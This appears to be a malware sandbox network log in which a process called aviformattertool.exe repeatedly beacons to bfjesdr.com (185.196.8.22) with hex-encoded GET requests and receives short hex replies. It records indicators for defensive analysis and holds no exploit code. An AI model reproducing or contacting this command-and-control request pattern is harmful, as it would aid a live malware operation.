                                                                                                                                                        Jan 13, 2024 06:33:02.636725903 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:02.853491068 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:02 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449749185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:03.182521105 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:03.405860901 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:03 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.449750185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:03.712527990 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:03.931130886 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:03 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:04.041182995 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:04.266657114 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:04 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.449751185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:04.574387074 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:04.808871984 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:04 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.449752185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:05.129722118 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:05.351854086 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:05 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:05.463480949 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:05.681056023 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:05 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:05.793431997 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:06.010400057 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:05 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.449753185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:06.324937105 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:06.546228886 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:06 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.449754185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:06.855163097 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:07.072206020 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:06 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:07.182902098 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:07.405956984 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:07 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.449755185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:07.714122057 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:07.930588007 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:07 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:08.041169882 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:08.262914896 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:08 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.449756185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:08.572235107 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:08.788881063 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:08 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:08.901734114 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:09.128509998 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:09 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.449757185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:09.431405067 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:09.647475958 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:09 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:09.764830112 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:09.981295109 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:09 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        20192.168.2.449758185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:10.293401003 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:10.514431953 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:10 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        21192.168.2.449759185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:10.824712038 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:11.041846991 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:10 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        22192.168.2.449760185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:11.360379934 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:11.581237078 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:11 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        23192.168.2.449761185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:11.887798071 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:12.116878986 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:12.231085062 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:12.449938059 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        24192.168.2.449762185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:12.761931896 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:12.978080988 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
